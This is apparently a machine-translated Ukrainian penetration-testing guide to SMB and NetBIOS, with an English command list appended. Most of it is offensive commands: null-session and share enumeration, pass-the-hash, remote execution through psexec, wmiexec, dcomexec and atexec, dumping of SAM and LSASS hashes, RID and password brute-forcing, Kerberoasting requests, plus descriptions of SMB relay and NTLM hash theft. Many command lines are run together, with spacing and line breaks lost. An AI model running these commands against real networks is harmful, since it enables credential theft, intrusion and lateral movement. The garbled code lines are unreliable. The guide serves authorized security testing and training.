Система базового вводу-виводу мережі** (NetBIOS)** — це програмний протокол, розроблений для забезпечення взаємодії додатків, ПК та робочих станцій у локальній мережі (LAN) з мережевим обладнанням та сприяння передачі даних через мережу. Ідентифікація та розташування програмних додатків, що працюють у мережі NetBIOS, здійснюється через їхні імена NetBIOS, які можуть мати до 16 символів у довжину і часто відрізняються від імені комп'ютера. Сесія NetBIOS між двома додатками ініціюється, коли один додаток (який діє як клієнт) віддає команду "викликати" інший додаток (який діє як сервер), використовуючи TCP порт 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Технічно, порт 139 називається «NBT over IP», тоді як порт 445 ідентифікується як «SMB over IP». Абревіатура SMB означає «Server Message Blocks», яка також сучасно відома як Common Internet File System (CIFS). Як протокол мережевого рівня додатків, SMB/CIFS в основному використовується для забезпечення спільного доступу до файлів, принтерів, послідовних портів та полегшення різних форм комунікації між вузлами в мережі.
Наприклад, у контексті Windows підкреслюється, що SMB може працювати безпосередньо через TCP/IP, усуваючи необхідність у NetBIOS через TCP/IP, за допомогою використання порту 445. Навпаки, на різних системах спостерігається використання порту 139, що вказує на те, що SMB виконується разом з NetBIOS через TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Протокол Server Message Block (SMB), що працює за моделлю клієнт-сервер, призначений для регулювання доступу до файлів, каталогів та інших мережевих ресурсів, таких як принтери та маршрутизатори. Переважно використовується в серії операційних систем Windows, SMB забезпечує зворотну сумісність, дозволяючи пристроям з новішими версіями операційної системи Microsoft безперешкодно взаємодіяти з тими, що працюють на старіших версіях. Крім того, проект Samba пропонує безкоштовне програмне забезпечення, що дозволяє реалізувати SMB на системах Linux та Unix, тим самим полегшуючи крос-платформену комунікацію через SMB.
Спільні ресурси, що представляють произвольні частини локальної файлової системи, можуть надаватися сервером SMB, що робить ієрархію видимою для клієнта частково незалежною від фактичної структури сервера. Списки контролю доступу (ACLs), які визначають права доступу, дозволяють точний контроль над дозволами користувачів, включаючи атрибути, такі як execute, read та full access. Ці дозволи можуть бути призначені окремим користувачам або групам, залежно від спільних ресурсів, і відрізняються від локальних дозволів, встановлених на сервері.
IPC$ Share
Доступ до спільного ресурсу IPC$ можна отримати через анонімну нульову сесію, що дозволяє взаємодіяти з сервісами, які відкриті через іменовані канали. Утиліта enum4linux корисна для цієї мети. Правильне використання дозволяє отримати:
Інформацію про операційну систему
Деталі про батьківський домен
Зведення локальних користувачів та груп
Інформацію про доступні SMB спільні ресурси
Діючу політику безпеки системи
Ця функціональність є критично важливою для мережевих адміністраторів та фахівців з безпеки для оцінки безпекової позиції служб SMB (Server Message Block) в мережі. enum4linux надає всебічний огляд середовища SMB цільової системи, що є суттєвим для виявлення потенційних вразливостей та забезпечення належного захисту служб SMB.
enum4linux-atarget_ip
Вищезазначена команда є прикладом того, як enum4linux може бути використаний для виконання повної енумерації проти цілі, вказаної за допомогою target_ip.
Що таке NTLM
Якщо ви не знаєте, що таке NTLM, або хочете дізнатися, як він працює і як його зловживати, вам буде дуже цікава ця сторінка про NTLM, де пояснюється як працює цей протокол і як ви можете скористатися ним:
Щоб шукати можливі експлойти для версії SMB, важливо знати, яка версія використовується. Якщо ця інформація не з'являється в інших використовуваних інструментах, ви можете:
#!/bin/sh#Author: rewardone#Description:# Requires root or enough permissions to use tcpdump# Will listen for the first 7 packets of a null login# and grab the SMB Version#Notes:# Will sometimes not capture or will print multiple# lines. May need to run a second time for success.if [ -z $1 ]; thenecho"Usage: ./smbver.sh RHOST {RPORT}"&&exit; else rhost=$1; fiif [ !-z $2 ]; then rport=$2; else rport=139; fitcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo"exit"|smbclient-L $rhost 1>/dev/null2>/dev/nullecho""&&sleep.1
#Dump interesting informationenum4linux-a [-u "<username>"-p"<passwd>"]<IP>enum4linux-ng-A [-u "<username>"-p"<passwd>"]<IP>nmap--script"safe or smb-enum-*"-p445<IP>#Connect to the rpcrpcclient-U""-N<IP>#No credsrpcclient//machine.htb-Udomain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb--pw-nt-hashrpcclient-U"username%passwd"<IP>#With creds#You can use querydispinfo and enumdomusers to query user information#Dump user information/usr/share/doc/python3-impacket/examples/samrdump.py-port139 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/samrdump.py-port445 [[domain/]username[:password]@]<targetName or address>#Map possible RPC endpoints/usr/share/doc/python3-impacket/examples/rpcdump.py-port135 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/rpcdump.py-port139 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/rpcdump.py-port445 [[domain/]username[:password]@]<targetName or address>
Перерахунок користувачів, груп та увійшлих користувачів
Цю інформацію вже слід зібрати з enum4linux та enum4linux-ng
У вікні файлового браузера (nautilus, thunar тощо)
smb://friendzone.htb/general/
Перерахунок спільних папок
Список спільних папок
Завжди рекомендується перевірити, чи можете ви отримати доступ до чогось, якщо у вас немає облікових даних, спробуйте використати nullоблікові дані/гостевий користувач.
smbclient--no-pass-L//<IP># Null usersmbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap-H<IP> [-P <PORT>]#Null usersmbmap-u"username"-p"password"-H<IP> [-P <PORT>]#Credssmbmap-u"username"-p"<NT>:<LM>"-H<IP> [-P <PORT>]#Pass-the-Hashsmbmap-R-u"username"-p"password"-H<IP> [-P <PORT>]#Recursive listcrackmapexecsmb<IP>-u''-p''--shares#Null usercrackmapexecsmb<IP>-u'username'-p'password'--shares#Guest usercrackmapexecsmb<IP>-u'username'-H'<HASH>'--shares#Guest user
Підключення/Список спільної папки
#Connect using smbclientsmbclient--no-pass//<IP>/<Folder>smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient#List with smbmap, without folder it list everythingsmbmap [-u "username"-p"password"]-R [Folder] -H <IP> [-P <PORT>] # Recursive listsmbmap [-u "username"-p"password"]-r [Folder] -H <IP> [-P <PORT>] # Non-Recursive listsmbmap-u"username"-p"<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Ручне перерахування Windows-спільних ресурсів та підключення до них
Можливо, ви обмежені у відображенні будь-яких спільних ресурсів хост-машини, і коли ви намагаєтеся їх перерахувати, здається, що немає жодних спільних ресурсів для підключення. Тому варто спробувати вручну підключитися до спільного ресурсу. Щоб вручну перерахувати спільні ресурси, ви можете звернути увагу на відповіді, такі як NT_STATUS_ACCESS_DENIED та NT_STATUS_BAD_NETWORK_NAME, використовуючи дійсну сесію (наприклад, нульову сесію або дійсні облікові дані). Це може вказувати на те, чи існує спільний ресурс, і ви не маєте до нього доступу, або спільний ресурс взагалі не існує.
Звичайні імена спільних ресурсів для цілей Windows:
C$
D$
ADMIN$
IPC$
PRINT$
FAX$
SYSVOL
NETLOGON
(Звичайні імена спільних ресурсів з Оцінки безпеки мережі, 3-тє видання)
Ви можете спробувати підключитися до них, використовуючи наступну команду
smbclient-U'%'-N \\\\<IP>\\<SHARE># null session to connect to a windows sharesmbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
для цього скрипта (використовуючи нульову сесію)
#/bin/baship='<TARGET-IP-HERE>'shares=('C$''D$''ADMIN$''IPC$''PRINT$''FAX$''SYSVOL''NETLOGON')for share in ${shares[*]}; dooutput=$(smbclient-U'%'-N \\\\$ip\\$share -c'')if [[ -z $output ]]; thenecho "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
elseecho $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)fidone
приклади
smbclient-U'%'-N \\\\192.168.0.24\\im_clearly_not_here# returns NT_STATUS_BAD_NETWORK_NAMEsmbclient-U'%'-N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Перерахувати спільні ресурси з Windows / без сторонніх інструментів
PowerShell
# Retrieves the SMB shares on the locale computer.Get-SmbShareGet-WmiObject-Class Win32_Share# Retrieves the SMB shares on a remote computer.get-smbshare-CimSession "<computer name or session object>"# Retrieves the connections established from the local SMB client to the SMB servers.Get-SmbConnection
CMD консоль
# List shares on the local computernetshare# List shares on a remote computer (including hidden ones)netview \\<ip>/all
Спеціально цікаві з загальних папок файли під назвою Registry.xml, оскільки вони можуть містити паролі для користувачів, налаштованих на автологін через групову політику. Або файли web.config, оскільки вони містять облікові дані.
SYSVOL share є доступним для читання для всіх автентифікованих користувачів у домені. Там ви можете знайти багато різних пакетних, VBScript та PowerShell скриптів.
Вам слід перевіритискрипти всередині, оскільки ви можете знайти чутливу інформацію, таку як паролі.
Читання реєстру
Ви можете мати можливість читати реєстр, використовуючи деякі виявлені облікові дані. Impacket reg.py дозволяє вам спробувати:
crackmapexec може виконувати команди зловживаючи будь-яким з mmcexec, smbexec, atexec, wmiexec, при цьому wmiexec є за замовчуванням методом. Ви можете вказати, який варіант ви віддаєте перевагу, за допомогою параметра --exec-method:
apt-getinstallcrackmapexeccrackmapexecsmb192.168.10.11-uAdministrator-p'P@ssw0rd'-X'$PSVersionTable'#Execute Powershellcrackmapexecsmb192.168.10.11-uAdministrator-p'P@ssw0rd'-xwhoami#Excute cmdcrackmapexecsmb192.168.10.11-uAdministrator-H<NTHASH>-xwhoami#Pass-the-Hash# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}crackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--sam#Dump SAMcrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--lsa#Dump LSASS in memmory hashescrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--sessions#Get sessions (crackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--loggedon-users#Get logged-on userscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--disks#Enumerate the diskscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--users#Enumerate userscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--groups# Enumerate groupscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--local-groups# Enumerate local groupscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--pass-pol#Get password policycrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--rid-brute#RID brutecrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-H<HASH>#Pass-The-Hash
Обидва варіанти створять нову службу (використовуючи \pipe\svcctl через SMB) на машині жертви і використовують її для виконання чогось (psexecзавантажить виконуваний файл до ADMIN$ спільного доступу, а smbexec вказуватиме на cmd.exe/powershell.exe і передаватиме в аргументах корисне навантаження --безфайлова техніка--).
Більше інформації про psexecта smbexec.
У kali він розташований за адресою /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted./psexec.py [[domain/]username[:password]@]<targetName or address>./psexec.py-hashes<LM:NT>administrator@10.10.10.103#Pass-the-Hashpsexec \\192.168.122.66-uAdministrator-p123456Wwpsexec \\192.168.122.66-uAdministrator-pq23q34t34twd3w34t34wtw34t# Use pass the hash
Використовуючи параметр-k, ви можете аутентифікуватися за допомогою kerberos замість NTLM
Сховано виконайте командний оболонку, не торкаючись диска або не запускаючи нову службу, використовуючи DCOM через порт 135.
У kali він розташований у /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted./wmiexec.py [[domain/]username[:password]@]<targetName or address>#Prompt for password./wmiexec.py-hashesLM:NTadministrator@10.10.10.103#Pass-the-Hash#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Використовуючи параметр-k, ви можете аутентифікуватися за допомогою kerberos замість NTLM.
#If no password is provided, it will be prompted./dcomexec.py [[domain/]username[:password]@]<targetName or address>./dcomexec.py-hashes<LM:NT>administrator@10.10.10.103#Pass-the-Hash#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Виконання команд через Планувальник завдань (використовуючи \pipe\atsvc через SMB).
У kali він знаходиться за адресою /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address>"command"./atexec.py-hashes<LM:NT>administrator@10.10.10.175"whoami"
Це не рекомендується, ви можете заблокувати обліковий запис, якщо перевищите максимальну кількість спроб
nmap--scriptsmb-brute-p445<IP>ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB relay attack
Ця атака використовує набір інструментів Responder для захоплення SMB аутентифікаційних сесій в внутрішній мережі та пересилає їх на цільову машину. Якщо сесія аутентифікації є успішною, вона автоматично перенаправить вас у системнуконсоль.
Більше інформації про цю атаку тут.
SMB-Trap
Бібліотека Windows URLMon.dll автоматично намагається аутентифікуватися до хоста, коли сторінка намагається отримати доступ до деякого контенту через SMB, наприклад: img src="\\10.10.10.10\path\image.jpg"
Це відбувається з функціями:
URLDownloadToFile
URLDownloadToCache
URLOpenStream
URLOpenBlockingStream
Які використовуються деякими браузерами та інструментами (такими як Skype)
SMBTrap using MitMf
NTLM Theft
Схоже на SMB Trapping, розміщення шкідливих файлів на цільовій системі (через SMB, наприклад) може викликати спробу аутентифікації SMB, що дозволяє перехопити хеш NetNTLMv2 за допомогою інструменту, такого як Responder. Хеш потім може бути зламаний офлайн або використаний в SMB relay attack.
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
